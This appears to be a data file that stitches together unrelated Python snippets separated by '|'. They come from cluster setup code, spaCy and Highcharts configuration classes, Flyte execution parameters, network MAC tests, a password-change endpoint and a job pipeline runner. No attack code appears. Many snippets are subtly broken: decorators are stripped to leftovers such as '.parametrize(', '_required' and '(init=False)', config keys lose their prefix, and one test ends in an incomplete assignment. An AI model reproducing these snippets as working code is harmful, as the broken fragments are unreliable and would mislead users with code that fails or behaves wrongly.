except KeyError as err:
raise ConfigurationError('No cluster template `{0}` found in configuration file'.format(cluster_template))
try:
conf = conf_template['setup']
except KeyError as err:
raise ConfigurationError('No setup section for cluster template `{0}` found in configuration file'.format(cluster_template))
if name:
conf['cluster_name'] = name
conf_login = self.cluster_conf[cluster_template]['login']
provider_name = conf.get('provider', 'ansible')
if (provider_name not in SETUP_PROVIDERS):
raise ConfigurationError(('Invalid value `%s` for `setup_provider` in configuration file.' % provider_name))
provider = _get_provider(provider_name, SETUP_PROVIDERS)
storage_path = self.storage_path
playbook_path = conf.pop('playbook_path', None)
groups = self._read_node_groups(conf)
environment_vars = {}
for (node_kind, grps) in groups.items():
if (not isinstance(grps, list)):
groups[node_kind] = [grps]
environment_vars[node_kind] = {}
for (key, value) in (list(conf.items()) + list(self.cluster_conf[cluster_template].items())):
for prefix in [(node_kind + '_var_'), 'global_var_']:
if key.startswith(prefix):
var = key.replace(prefix, '')
environment_vars[node_kind][var] = value
log.debug('setting variable %s=%s for node kind %s', var, value, node_kind)
return provider(groups, playbook_path=playbook_path, environment_vars=environment_vars, storage_path=storage_path, sudo=conf_login['image_sudo'], sudo_user=conf_login['image_user_sudo'], **conf)
def _read_node_groups(self, conf):
result = defaultdict(list)
for (key, value) in conf.items():
if (not key.endswith('_groups')):
continue
node_kind = key[:(- len('_groups'))]
group_names = [group_name.strip() for group_name in value.split(',') if group_name.strip()]
for group_name in group_names:
if (group_name in self._RENAMED_NODE_GROUPS):
old_group_name = group_name
(group_name, remove_at) = self._RENAMED_NODE_GROUPS[group_name]
warn('Group `{0}` was renamed to `{1}`; please fix your configuration file. Support for automatically renaming this group will be removed in {2}.'.format(old_group_name, group_name, ('ElastiCluster {0}'.format(remove_at) if remove_at else 'a future version of ElastiCluster')), DeprecationWarning)
result[node_kind].append(group_name)
return result
_RENAMED_NODE_GROUPS = {'condor_workers': ('condor_worker', '1.4'), 'gluster_client': ('glusterfs_client', '1.4'), 'gluster_data': ('glusterfs_server', '1.4'), 'gridengine_clients': ('gridengine_worker', '2.0'), 'maui_master': ('torque_master', '2.0'), 'pbs_clients': ('torque_worker', '2.0'), 'pbs_master': ('torque_master', '2.0'), 'slurm_clients': ('slurm_worker', '2.0'), 'slurm_workers': ('slurm_worker', '1.4')}
def create_repository(self):
return MultiDiskRepository(self.storage_path, self.storage_type) |
def fewshot_cfg_string():
return f'''
[nlp]
lang = "en"
pipeline = ["llm"]
batch_size = 128
[components]
[components.llm]
factory = "llm"
[components.llm.task]
_tasks = "spacy.SpanCat.v2"
labels = ["PER", "ORG", "LOC"]
[components.llm.task.examples]
= "spacy.FewShotReader.v1"
path = {str(((Path(__file__).parent / 'examples') / 'ner.yml'))}
[components.llm.task.normalizer]
= "spacy.LowercaseNormalizer.v1"
[components.llm.model]
_models = "spacy.GPT-3-5.v1"
''' |
class _coconut(object):
import collections, copy, functools, types, itertools, operator, threading, os, warnings, contextlib, traceback, weakref, multiprocessing, inspect
from multiprocessing import dummy as multiprocessing_dummy
if (_coconut_sys.version_info < (3, 2)):
try:
from backports.functools_lru_cache import lru_cache
functools.lru_cache = lru_cache
except ImportError as lru_cache_import_err:
functools.lru_cache = _coconut_missing_module(lru_cache_import_err)
if (_coconut_sys.version_info < (3,)):
import copy_reg as copyreg
else:
import copyreg
if (_coconut_sys.version_info < (3, 4)):
try:
import trollius as asyncio
except ImportError as trollius_import_err:
class you_need_to_install_trollius(_coconut_missing_module):
__slots__ = ()
def coroutine(self, func):
def raise_import_error(*args, **kwargs):
raise self._import_err
return raise_import_error
def Return(self, obj):
raise self._import_err
asyncio = you_need_to_install_trollius(trollius_import_err)
asyncio_Return = asyncio.Return
else:
import asyncio
asyncio_Return = StopIteration
try:
import async_generator
except ImportError as async_generator_import_err:
async_generator = _coconut_missing_module(async_generator_import_err)
if (_coconut_sys.version_info < (3,)):
import cPickle as pickle
else:
import pickle
OrderedDict = (collections.OrderedDict if (_coconut_sys.version_info >= (2, 7)) else dict)
if (_coconut_sys.version_info < (3, 3)):
abc = collections
else:
import collections.abc as abc
typing = types.ModuleType(_coconut_py_str('typing'))
try:
import typing_extensions
except ImportError:
typing_extensions = None
else:
for _name in dir(typing_extensions):
if (not _name.startswith('__')):
setattr(typing, _name, getattr(typing_extensions, _name))
typing.__doc__ = ('Coconut version of typing that makes use of typing.typing_extensions when possible.\n\n' + (getattr(typing, '__doc__') or "The typing module is not available at runtime in Python 3.4 or earlier; try hiding your typedefs behind an 'if TYPE_CHECKING:' block."))
if (_coconut_sys.version_info < (3, 5)):
if (not hasattr(typing, 'TYPE_CHECKING')):
typing.TYPE_CHECKING = False
if (not hasattr(typing, 'Any')):
typing.Any = Ellipsis
if (not hasattr(typing, 'cast')):
def cast(t, x):
return x
typing.cast = cast
cast = staticmethod(cast)
if (not hasattr(typing, 'TypeVar')):
def TypeVar(name, *args, **kwargs):
return name
typing.TypeVar = TypeVar
TypeVar = staticmethod(TypeVar)
if (not hasattr(typing, 'Generic')):
class Generic_mock(object):
__slots__ = ()
def __getitem__(self, vars):
return _coconut.object
typing.Generic = Generic_mock()
else:
import typing as _typing
for _name in dir(_typing):
if (not hasattr(typing, _name)):
setattr(typing, _name, getattr(_typing, _name))
if (_coconut_sys.version_info < (3, 6)):
if (not hasattr(typing, 'NamedTuple')):
def NamedTuple(name, fields):
return _coconut.collections.namedtuple(name, [x for (x, t) in fields])
typing.NamedTuple = NamedTuple
NamedTuple = staticmethod(NamedTuple)
if (_coconut_sys.version_info < (3, 8)):
if (not hasattr(typing, 'Protocol')):
class YouNeedToInstallTypingExtensions(object):
__slots__ = ()
def __init__(self):
raise _coconut.TypeError('Protocols cannot be instantiated')
typing.Protocol = YouNeedToInstallTypingExtensions
if (_coconut_sys.version_info < (3, 10)):
if (not hasattr(typing, 'ParamSpec')):
def ParamSpec(name, *args, **kwargs):
return _coconut.typing.TypeVar(name)
typing.ParamSpec = ParamSpec
if ((not hasattr(typing, 'TypeAlias')) or (not hasattr(typing, 'Concatenate'))):
class you_need_to_install_typing_extensions(object):
__slots__ = ()
typing.TypeAlias = typing.Concatenate = you_need_to_install_typing_extensions()
if (_coconut_sys.version_info < (3, 11)):
if (not hasattr(typing, 'TypeVarTuple')):
def TypeVarTuple(name, *args, **kwargs):
return _coconut.typing.TypeVar(name)
typing.TypeVarTuple = TypeVarTuple
if (not hasattr(typing, 'Unpack')):
class you_need_to_install_typing_extensions(object):
__slots__ = ()
typing.Unpack = you_need_to_install_typing_extensions()
def _typing_getattr(name):
raise _coconut.AttributeError(("typing.%s is not available on the current Python version and couldn't be looked up in typing_extensions; try hiding your typedefs behind an 'if TYPE_CHECKING:' block" % (name,)))
typing.__getattr__ = _typing_getattr
_typing_getattr = staticmethod(_typing_getattr)
zip_longest = (itertools.zip_longest if (_coconut_sys.version_info >= (3,)) else itertools.izip_longest)
try:
import numpy
except ImportError as numpy_import_err:
numpy = _coconut_missing_module(numpy_import_err)
else:
abc.Sequence.register(numpy.ndarray)
numpy_modules = ('numpy', 'torch', 'pandas', 'jaxlib')
pandas_numpy_modules = ('pandas',)
jax_numpy_modules = ('jaxlib',)
tee_type = type(itertools.tee((), 1)[0])
reiterables = (abc.Sequence, abc.Mapping, abc.Set)
fmappables = (list, tuple, dict, set, frozenset)
abc.Sequence.register(collections.deque)
(Ellipsis, NotImplemented, NotImplementedError, Exception, AttributeError, ImportError, IndexError, KeyError, NameError, TypeError, ValueError, StopIteration, RuntimeError, all, any, bool, bytes, callable, classmethod, complex, dict, enumerate, filter, float, frozenset, getattr, hasattr, hash, id, int, isinstance, issubclass, iter, len, list, locals, globals, map, min, max, next, object, property, range, reversed, set, setattr, slice, str, sum, super, tuple, type, vars, zip, repr, print, bytearray) = (Ellipsis, NotImplemented, NotImplementedError, Exception, AttributeError, ImportError, IndexError, KeyError, NameError, TypeError, ValueError, StopIteration, RuntimeError, all, any, bool, bytes, callable, classmethod, complex, dict, enumerate, filter, float, frozenset, getattr, hasattr, hash, id, int, isinstance, issubclass, iter, len, list, locals, globals, map, min, max, next, object, property, range, reversed, set, setattr, slice, str, sum, staticmethod(super), tuple, type, vars, zip, staticmethod(repr), staticmethod(print), bytearray) |
def sign(wheelfile, replace=False, get_keyring=get_keyring):
warn_signatures()
(WheelKeys, keyring) = get_keyring()
ed25519ll = signatures.get_ed25519ll()
wf = WheelFile(wheelfile, append=True)
wk = WheelKeys().load()
name = wf.parsed_filename.group('name')
sign_with = wk.signers(name)[0]
print('Signing {} with {}'.format(name, sign_with[1]))
vk = sign_with[1]
kr = keyring.get_keyring()
sk = kr.get_password('wheel', vk)
keypair = ed25519ll.Keypair(urlsafe_b64decode(binary(vk)), urlsafe_b64decode(binary(sk)))
record_name = (wf.distinfo_name + '/RECORD')
sig_name = (wf.distinfo_name + '/RECORD.jws')
if (sig_name in wf.zipfile.namelist()):
raise WheelError('Wheel is already signed.')
record_data = wf.zipfile.read(record_name)
payload = {'hash': ('sha256=' + native(urlsafe_b64encode(hashlib.sha256(record_data).digest())))}
sig = signatures.sign(payload, keypair)
wf.zipfile.writestr(sig_name, json.dumps(sig, sort_keys=True))
wf.zipfile.close() |
def init_arg():
parser = argparse.ArgumentParser()
parser.add_argument('--exe', help='python interpreter to use')
parser.add_argument('--it', default=10000, type=int)
parser.add_argument('--kk', default=1)
parser.add_argument('--alpha')
parser.add_argument('-o')
parser.add_argument('--projdir')
parser.add_argument('--verify', default=1, type=int)
return parser.parse_args() |
def _translate_glob(pat):
translated_parts = []
for part in _iexplode_path(pat):
translated_parts.append(_translate_glob_part(part))
os_sep_class = ('[%s]' % re.escape(SEPARATORS))
res = _join_translated(translated_parts, os_sep_class)
return '(?ms){res}\\Z'.format(res=res) |
class FaucetUntaggedACLMirrorDefaultAllowTest(FaucetUntaggedACLMirrorTest):
CONFIG_GLOBAL = '\nvlans:\n 100:\n description: "untagged"\n unicast_flood: False\nacls:\n 1:\n - rule:\n actions:\n mirror: %(port_3)d\n'
CONFIG = '\n interfaces:\n %(port_1)d:\n native_vlan: 100\n acl_in: 1\n %(port_2)d:\n native_vlan: 100\n acl_in: 1\n %(port_3)d:\n native_vlan: 100\n %(port_4)d:\n native_vlan: 100\n' |
.parametrize(('list_of_objects', 'expected_result'), [([entry_1, entry_2], GRAPH_PART), ([entry_1, entry_2, entry_3], GRAPH_PART_SYMLINK)])
def test_create_graph_nodes_and_groups(list_of_objects, expected_result):
assert (create_data_graph_nodes_and_groups(list_of_objects, WHITELIST) == expected_result) |
class ProfileReport():
calls: int
total_time: int
children: Dict[(str, 'ProfileReport')]
parent: Optional['ProfileReport']
def __init__(self) -> None:
self.calls = 0
self.total_time = 0
self.children = {}
self.parent = None
def _to_string(self, indent: str) -> str:
s = ''
attributed = 0
for (key, value) in self.children.items():
s += f'''{indent}{key}:({value.calls}) {(value.total_time // 1000000)} ms
'''
s += value._to_string((indent + ' '))
attributed += value.total_time
if (self.parent is None):
s += (('Total time: ' + str((attributed // 1000000))) + ' ms\n')
elif (len(self.children) > 0):
unattributed = (self.total_time - attributed)
s += f'''{indent}unattributed: {abs((unattributed // 1000000))} ms
'''
return s
def __str__(self) -> str:
return self._to_string('') |
class OptionPlotoptionsFunnel3dLabel(Options):
def boxesToAvoid(self):
return self._config_get(None)
def boxesToAvoid(self, value: Any):
self._config(value, js_type=False)
def connectorAllowed(self):
return self._config_get(False)
def connectorAllowed(self, flag: bool):
self._config(flag, js_type=False)
def connectorNeighbourDistance(self):
return self._config_get(24)
def connectorNeighbourDistance(self, num: float):
self._config(num, js_type=False)
def enabled(self):
return self._config_get(True)
def enabled(self, flag: bool):
self._config(flag, js_type=False)
def format(self):
return self._config_get('undefined')
def format(self, text: str):
self._config(text, js_type=False)
def formatter(self):
return self._config_get('undefined')
def formatter(self, value: Any):
self._config(value, js_type=False)
def maxFontSize(self):
return self._config_get(None)
def maxFontSize(self, num: float):
self._config(num, js_type=False)
def minFontSize(self):
return self._config_get(None)
def minFontSize(self, num: float):
self._config(num, js_type=False)
def onArea(self):
return self._config_get(None)
def onArea(self, flag: bool):
self._config(flag, js_type=False)
def style(self) -> 'OptionPlotoptionsFunnel3dLabelStyle':
return self._config_sub_data('style', OptionPlotoptionsFunnel3dLabelStyle)
def useHTML(self):
return self._config_get(False)
def useHTML(self, flag: bool):
self._config(flag, js_type=False) |
class ExecutionParameters(object):
(init=False)
class Builder(object):
stats: taggable.TaggableStats
attrs: typing.Dict[(str, typing.Any)]
decks: List[Deck]
raw_output_prefix: Optional[str] = None
execution_id: typing.Optional[_identifier.WorkflowExecutionIdentifier] = None
working_dir: typing.Optional[str] = None
checkpoint: typing.Optional[Checkpoint] = None
execution_date: typing.Optional[datetime] = None
logging: Optional[_logging.Logger] = None
task_id: typing.Optional[_identifier.Identifier] = None
def __init__(self, current: typing.Optional[ExecutionParameters]=None):
self.stats = (current.stats if current else None)
self.execution_date = (current.execution_date if current else None)
self.working_dir = (current.working_directory if current else None)
self.execution_id = (current.execution_id if current else None)
self.logging = (current.logging if current else None)
self.checkpoint = (current._checkpoint if current else None)
self.decks = (current._decks if current else [])
self.attrs = (current._attrs if current else {})
self.raw_output_prefix = (current.raw_output_prefix if current else None)
self.task_id = (current.task_id if current else None)
def add_attr(self, key: str, v: typing.Any) -> ExecutionParameters.Builder:
self.attrs[key] = v
return self
def build(self) -> ExecutionParameters:
if (self.working_dir and (not isinstance(self.working_dir, utils.AutoDeletingTempDir))):
pathlib.Path(typing.cast(str, self.working_dir)).mkdir(parents=True, exist_ok=True)
return ExecutionParameters(execution_date=self.execution_date, stats=self.stats, tmp_dir=self.working_dir, execution_id=self.execution_id, logging=self.logging, checkpoint=self.checkpoint, decks=self.decks, raw_output_prefix=self.raw_output_prefix, task_id=self.task_id, **self.attrs)
def new_builder(current: Optional[ExecutionParameters]=None) -> Builder:
return ExecutionParameters.Builder(current=current)
def with_task_sandbox(self) -> Builder:
prefix = self.working_directory
if isinstance(self.working_directory, utils.AutoDeletingTempDir):
prefix = self.working_directory.name
task_sandbox_dir = tempfile.mkdtemp(prefix=prefix)
p = pathlib.Path(task_sandbox_dir)
cp_dir = p.joinpath('__cp')
cp_dir.mkdir(exist_ok=True)
cp = SyncCheckpoint(checkpoint_dest=str(cp_dir))
b = self.new_builder(self)
b.checkpoint = cp
b.working_dir = task_sandbox_dir
return b
def builder(self) -> Builder:
return ExecutionParameters.Builder(current=self)
def __init__(self, execution_date, tmp_dir, stats, execution_id: typing.Optional[_identifier.WorkflowExecutionIdentifier], logging, raw_output_prefix, output_metadata_prefix=None, checkpoint=None, decks=None, task_id: typing.Optional[_identifier.Identifier]=None, **kwargs):
if (decks is None):
decks = []
self._stats = stats
self._execution_date = execution_date
self._working_directory = tmp_dir
self._execution_id = execution_id
self._logging = logging
self._raw_output_prefix = raw_output_prefix
self._output_metadata_prefix = output_metadata_prefix
self._attrs = kwargs
self._secrets_manager = SecretsManager()
self._checkpoint = checkpoint
self._decks = decks
self._task_id = task_id
def stats(self) -> taggable.TaggableStats:
return self._stats
def logging(self) -> _logging.Logger:
return self._logging
def raw_output_prefix(self) -> str:
return self._raw_output_prefix
def output_metadata_prefix(self) -> str:
return self._output_metadata_prefix
def working_directory(self) -> str:
return self._working_directory
def execution_date(self) -> datetime:
return self._execution_date
def execution_id(self) -> _identifier.WorkflowExecutionIdentifier:
return self._execution_id
def task_id(self) -> typing.Optional[_identifier.Identifier]:
return self._task_id
def secrets(self) -> SecretsManager:
return self._secrets_manager
def checkpoint(self) -> Checkpoint:
if (self._checkpoint is None):
raise NotImplementedError('Checkpointing is not available, please check the version of the platform.')
return self._checkpoint
def decks(self) -> typing.List:
return self._decks
def default_deck(self) -> Deck:
from flytekit import Deck
return Deck('default')
def timeline_deck(self) -> 'TimeLineDeck':
from flytekit.deck.deck import TimeLineDeck
time_line_deck = None
for deck in self.decks:
if isinstance(deck, TimeLineDeck):
time_line_deck = deck
break
if (time_line_deck is None):
time_line_deck = TimeLineDeck('timeline')
return time_line_deck
def __getattr__(self, attr_name: str) -> typing.Any:
attr_name = attr_name.upper()
if (self._attrs and (attr_name in self._attrs)):
return self._attrs[attr_name]
raise AssertionError(f'{attr_name} not available as a parameter in Flyte context - are you in right task-type?')
def has_attr(self, attr_name: str) -> bool:
attr_name = attr_name.upper()
if (self._attrs and (attr_name in self._attrs)):
return True
return False
def get(self, key: str) -> typing.Any:
return self.__getattr__(attr_name=key) |
def _wasserstein_distance_norm(reference_data: pd.Series, current_data: pd.Series, feature_type: ColumnType, threshold: float) -> Tuple[(float, bool)]:
norm = max(np.std(reference_data), 0.001)
wd_norm_value = (stats.wasserstein_distance(reference_data, current_data) / norm)
return (wd_norm_value, (wd_norm_value >= threshold)) |
def extractUminovelBlogspotCom(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('With contract Skill many Brides!', 'With contract Skill many Brides!', 'translated'), ('WCSB', 'With contract Skill many Brides!', 'translated')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
def test_install_package(np_path):
assert (ethpm.get_installed_packages(np_path) == ([], []))
ethpm.install_package(np_path, 'ipfs://testipfs-math')
assert np_path.joinpath('contracts/math/Math.sol').exists()
assert (ethpm.get_installed_packages(np_path) == ([('math', '1.0.0')], [])) |
class OptionSeriesFunnelSonificationContexttracksActivewhen(Options):
def crossingDown(self):
return self._config_get(None)
def crossingDown(self, num: float):
self._config(num, js_type=False)
def crossingUp(self):
return self._config_get(None)
def crossingUp(self, num: float):
self._config(num, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def prop(self):
return self._config_get(None)
def prop(self, text: str):
self._config(text, js_type=False) |
class FlexibleTargeting(AbstractObject):
def __init__(self, api=None):
super(FlexibleTargeting, self).__init__()
self._isFlexibleTargeting = True
self._api = api
class Field(AbstractObject.Field):
behaviors = 'behaviors'
college_years = 'college_years'
connections = 'connections'
custom_audiences = 'custom_audiences'
education_majors = 'education_majors'
education_schools = 'education_schools'
education_statuses = 'education_statuses'
ethnic_affinity = 'ethnic_affinity'
family_statuses = 'family_statuses'
friends_of_connections = 'friends_of_connections'
generation = 'generation'
home_ownership = 'home_ownership'
home_type = 'home_type'
home_value = 'home_value'
household_composition = 'household_composition'
income = 'income'
industries = 'industries'
interested_in = 'interested_in'
interests = 'interests'
life_events = 'life_events'
moms = 'moms'
net_worth = 'net_worth'
office_type = 'office_type'
politics = 'politics'
relationship_statuses = 'relationship_statuses'
user_adclusters = 'user_adclusters'
work_employers = 'work_employers'
work_positions = 'work_positions'
_field_types = {'behaviors': 'list<IDName>', 'college_years': 'list<unsigned int>', 'connections': 'list<IDName>', 'custom_audiences': 'list<IDName>', 'education_majors': 'list<IDName>', 'education_schools': 'list<IDName>', 'education_statuses': 'list<unsigned int>', 'ethnic_affinity': 'list<IDName>', 'family_statuses': 'list<IDName>', 'friends_of_connections': 'list<IDName>', 'generation': 'list<IDName>', 'home_ownership': 'list<IDName>', 'home_type': 'list<IDName>', 'home_value': 'list<IDName>', 'household_composition': 'list<IDName>', 'income': 'list<IDName>', 'industries': 'list<IDName>', 'interested_in': 'list<unsigned int>', 'interests': 'list<IDName>', 'life_events': 'list<IDName>', 'moms': 'list<IDName>', 'net_worth': 'list<IDName>', 'office_type': 'list<IDName>', 'politics': 'list<IDName>', 'relationship_statuses': 'list<unsigned int>', 'user_adclusters': 'list<IDName>', 'work_employers': 'list<IDName>', 'work_positions': 'list<IDName>'}
def _get_field_enum_info(cls):
field_enum_info = {}
return field_enum_info |
class Test_mac(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_mac_is_multicast(self):
addr = b'\x01#Eg\x89\n'
val = True
res = mac.is_multicast(addr)
eq_(val, res)
def test_mac_haddr_to_str(self):
addr = 'aa:aa:aa:aa:aa:aa'
val = b'\xaa\xaa\xaa\xaa\xaa\xaa'
res = mac.haddr_to_str(val)
eq_(addr, res)
def test_mac_haddr_to_str_none(self):
addr = None
val = 'None'
res = mac.haddr_to_str(addr)
eq_(val, res)
(AssertionError)
def test_mac_haddr_to_str_assert(self):
val = b'\xaa\xaa\xaa\xaa\xaa'
res = mac.haddr_to_str(val)
def test_mac_haddr_to_bin_false(self):
addr = 'aa:aa:aa:aa:aa:aa'
val = b'\xaa\xaa\xaa\xaa\xaa\xaa'
res = mac.haddr_to_bin(addr)
eq_(val, res)
(ValueError)
def test_mac_haddr_to_bin_true(self):
addr = 'aa:aa:aa:aa:aa'
res = mac.haddr_to_bin(addr)
def test_mac_haddr_bitand(self):
addr = b'\xaa\xaa\xaa\xaa\xaa\xaa'
mask = b'\xff\xff\xff\x00\x00\x00'
val = b'\xaa\xaa\xaa\x00\x00\x00'
res = mac.haddr_bitand(addr, mask)
eq_(val, res) |
class OptionSeriesBellcurveSonificationContexttracksMappingLowpass(Options):
def frequency(self) -> 'OptionSeriesBellcurveSonificationContexttracksMappingLowpassFrequency':
return self._config_sub_data('frequency', OptionSeriesBellcurveSonificationContexttracksMappingLowpassFrequency)
def resonance(self) -> 'OptionSeriesBellcurveSonificationContexttracksMappingLowpassResonance':
return self._config_sub_data('resonance', OptionSeriesBellcurveSonificationContexttracksMappingLowpassResonance) |
class DecadePopupController(OptionsController):
def __init__(self, plugin, album_model):
super(DecadePopupController, self).__init__()
self._album_model = album_model
self.plugin = plugin
self._spritesheet = None
cl = CoverLocale()
cl.switch_locale(cl.Locale.LOCALE_DOMAIN)
self.values = OrderedDict()
self.values[_('All Decades')] = [(- 1), 'All Decades']
self.values[_('20s')] = [2020, '20s']
self.values[_('10s')] = [2010, '10s']
self.values[_('00s')] = [2000, '00s']
self.values[_('90s')] = [1990, '90s']
self.values[_('80s')] = [1980, '80s']
self.values[_('70s')] = [1970, '70s']
self.values[_('60s')] = [1960, '60s']
self.values[_('50s')] = [1950, '50s']
self.values[_('40s')] = [1940, '40s']
self.values[_('30s')] = [1930, '30s']
self.values[_('Older')] = [(- 1), 'Older']
self.options = list(self.values.keys())
if (date.today().year < 2020):
self.options.remove(_('20s'))
self._initial_decade = self.options[0]
self.update_images(False)
self.current_key = self._initial_decade
def update_images(self, *args):
self._spritesheet = self.create_spritesheet(self.plugin, self._spritesheet, 'decade')
if args[(- 1)]:
self.update_image = True
def do_action(self):
if (self.current_key == self._initial_decade):
self._album_model.remove_filter('decade')
else:
self._album_model.replace_filter('decade', self.values[self.current_key][0])
def get_current_image(self):
decade = self.values[self.current_key][1]
return self._spritesheet[decade]
def get_current_description(self):
return self.current_key |
def test_get_sub_awards_csv_sources(db):
original = VALUE_MAPPINGS['sub_awards']['filter_function']
VALUE_MAPPINGS['sub_awards']['filter_function'] = MagicMock(returned_value='')
csv_sources = download_generation.get_download_sources({'download_types': ['sub_awards'], 'filters': {'award_type_codes': list(award_type_mapping.keys())}})
assert (len(csv_sources) == 2)
VALUE_MAPPINGS['sub_awards']['filter_function'] = original
assert (csv_sources[0].file_type == 'd1')
assert (csv_sources[0].source_type == 'sub_awards')
assert (csv_sources[1].file_type == 'd2')
assert (csv_sources[1].source_type == 'sub_awards') |
class Profile(MethodView):
_required
def get(self):
result = {}
try:
result['user'] = current_user.username
result['admin'] = current_user.is_admin
result['email'] = current_user.email
except AttributeError:
abort(404)
return (jsonify(result), 200)
_required
def post(self):
try:
marsh_schema = parse_json_schema().load(request.json)
args = marsh_schema
except ValidationError as errors:
logger.debug('Validation error: {}'.format(errors))
return (errors.messages, 500)
logger.debug('Updating user details')
user = User.query.filter_by(id=current_user.id).first()
ret = []
if (isinstance(user, User) and ('password' in args)):
if args['password']:
if (('new_password' in args) and ('confirm_password' in args)):
if (args['confirm_password'] and args['new_password']):
if (args['new_password'] != args['confirm_password']):
return ({'msg': 'Passwords do not match'}, 400)
if bcrypt.check_password_hash(user.password, args['password']):
pass_hash = bcrypt.generate_password_hash(args['new_password'])
user.password = pass_hash.decode('utf-8')
logger.debug('Updating password')
ret.append({'msg': 'Password updated'})
crackq.app.session_interface.regenerate(session)
else:
return ({'msg': 'Invalid Password'}, 401)
if ('email' in args):
if (args['email'] and email_check(args['email'])):
if bcrypt.check_password_hash(user.password, args['password']):
user.email = args['email']
logger.debug('Updating email')
ret.append({'msg': 'Email updated'})
else:
return ({'msg': 'Invalid Password'}, 401)
if ret:
db.session.commit()
return (jsonify(ret), 200)
return ({'msg': 'Invalid Request'}, 500) |
class PipelineRunner():
def __init__(self, runner, max_concurrent_jobs=4, poll_interval=30, jobCompletionHandler=None, groupCompletionHandler=None):
self.__runner = runner
self.max_concurrent_jobs = max_concurrent_jobs
self.poll_interval = poll_interval
self.groups = []
self.njobs_in_group = {}
self.jobs = queue.Queue()
self.running = []
self.completed = []
self.handle_job_completion = jobCompletionHandler
self.handle_group_completion = groupCompletionHandler
def queueJob(self, working_dir, script, script_args, label=None, group=None):
job_name = ((os.path.splitext(os.path.basename(script))[0] + '.') + str(label))
if group:
if (group not in self.groups):
self.groups.append(group)
self.njobs_in_group[group] = 1
else:
self.njobs_in_group[group] += 1
self.jobs.put(Job(self.__runner, job_name, working_dir, script, script_args, label, group))
logging.debug(('Added job: now %d jobs in pipeline' % self.jobs.qsize()))
def nWaiting(self):
return self.jobs.qsize()
def nRunning(self):
return len(self.running)
def nCompleted(self):
return len(self.completed)
def isRunning(self):
self.update()
return ((self.nWaiting() > 0) or (self.nRunning() > 0))
def run(self, blocking=True):
logging.debug('PipelineRunner: started')
logging.debug(('Blocking mode : %s' % blocking))
print(('Initially %d jobs waiting, %d running, %d finished' % (self.nWaiting(), self.nRunning(), self.nCompleted())))
self.update()
if blocking:
while self.isRunning():
time.sleep(self.poll_interval)
print('Pipeline completed')
def update(self):
updated_status = False
for job in self.running[::(- 1)]:
if (not job.isRunning()):
self.running.remove(job)
self.completed.append(job)
updated_status = True
print(('Job has completed: %s: %s %s (%s)' % (job.job_id, job.name, os.path.basename(job.working_dir), time.asctime(time.localtime(job.end_time)))))
if self.handle_job_completion:
self.handle_job_completion(job)
if (job.group_label is not None):
jobs_in_group = []
for check_job in self.completed:
if (check_job.group_label == job.group_label):
jobs_in_group.append(check_job)
if (self.njobs_in_group[job.group_label] == len(jobs_in_group)):
print(("Group '%s' has completed" % job.group_label))
if self.handle_group_completion:
self.handle_group_completion(job.group_label, jobs_in_group)
elif job.errorState():
logging.warning(('Terminating job %s in error state' % job.job_id))
job.terminate()
while ((not self.jobs.empty()) and (self.nRunning() < self.max_concurrent_jobs)):
next_job = self.jobs.get()
next_job.start()
self.running.append(next_job)
updated_status = True
print(('Job has started: %s: %s %s (%s)' % (next_job.job_id, next_job.name, os.path.basename(next_job.working_dir), time.asctime(time.localtime(next_job.start_time)))))
if self.jobs.empty():
logging.debug('PipelineRunner: all jobs now submitted')
if updated_status:
print(('Currently %d jobs waiting, %d running, %d finished' % (self.nWaiting(), self.nRunning(), self.nCompleted())))
def report(self):
if (self.nRunning() > 0):
status = 'RUNNING'
elif (self.nWaiting() > 0):
status = 'WAITING'
else:
status = 'COMPLETED'
report = ('Pipeline status at %s: %s\n\n' % (time.asctime(), status))
dirs = []
for job in self.completed:
if (job.working_dir not in dirs):
dirs.append(job.working_dir)
for dirn in dirs:
report += ('\t%s\n' % dirn)
if (self.nWaiting() > 0):
report += ('\n%d jobs waiting to run\n' % self.nWaiting())
if (self.nRunning() > 0):
report += ('\n%d jobs running:\n' % self.nRunning())
for job in self.running:
report += ('\t%s\t%s\t%s\n' % (job.label, job.log, job.working_dir))
if (self.nCompleted() > 0):
report += ('\n%d jobs completed:\n' % self.nCompleted())
for job in self.completed:
report += ('\t%s\t%s\t%s\t%.1fs\t[%s]\n' % (job.label, job.log, job.working_dir, (job.end_time - job.start_time), job.status()))
return report
def __del__(self):
while (not self.jobs.empty()):
self.jobs.get()
for job in self.running:
logging.debug(('Terminating job %s' % job.job_id))
print(('Terminating job %s' % job.job_id))
try:
job.terminate()
except Exception as ex:
logging.error(('Failed to terminate job %s: %s' % (job.job_id, ex))) |
def test_set_get_text_alignment():
with Drawing() as ctx:
ctx.text_alignment = 'center'
assert (ctx.text_alignment == 'center')
with raises(TypeError):
ctx.text_alignment =
with raises(ValueError):
ctx.text_alignment = 'not-a-text-alignment-type' |
def extract_hash_from_duns_or_uei(duns_or_uei):
if (len(duns_or_uei) == 9):
qs_hash = RecipientLookup.objects.filter(duns=duns_or_uei).values('recipient_hash').first()
if (len(duns_or_uei) == 12):
qs_hash = RecipientLookup.objects.filter(uei=duns_or_uei.upper()).values('recipient_hash').first()
return (qs_hash['recipient_hash'] if qs_hash else None) |
class OptionPlotoptionsHeatmapSonificationDefaultinstrumentoptionsPointgrouping(Options):
def algorithm(self):
return self._config_get('minmax')
def algorithm(self, text: str):
self._config(text, js_type=False)
def enabled(self):
return self._config_get(True)
def enabled(self, flag: bool):
self._config(flag, js_type=False)
def groupTimespan(self):
return self._config_get(15)
def groupTimespan(self, num: float):
self._config(num, js_type=False)
def prop(self):
return self._config_get('y')
def prop(self, text: str):
self._config(text, js_type=False) |
def iter_stack_frames(frames=None, start_frame=None, skip=0, skip_top_modules=(), config=None):
if (not frames):
frame = (start_frame if (start_frame is not None) else inspect.currentframe().f_back)
frames = _walk_stack(frame)
max_frames = (config.stack_trace_limit if config else (- 1))
stop_ignoring = False
frames_count = 0
for (i, frame) in enumerate(frames):
if ((max_frames != (- 1)) and (frames_count == max_frames)):
break
if (i < skip):
continue
f_globals = getattr(frame, 'f_globals', {})
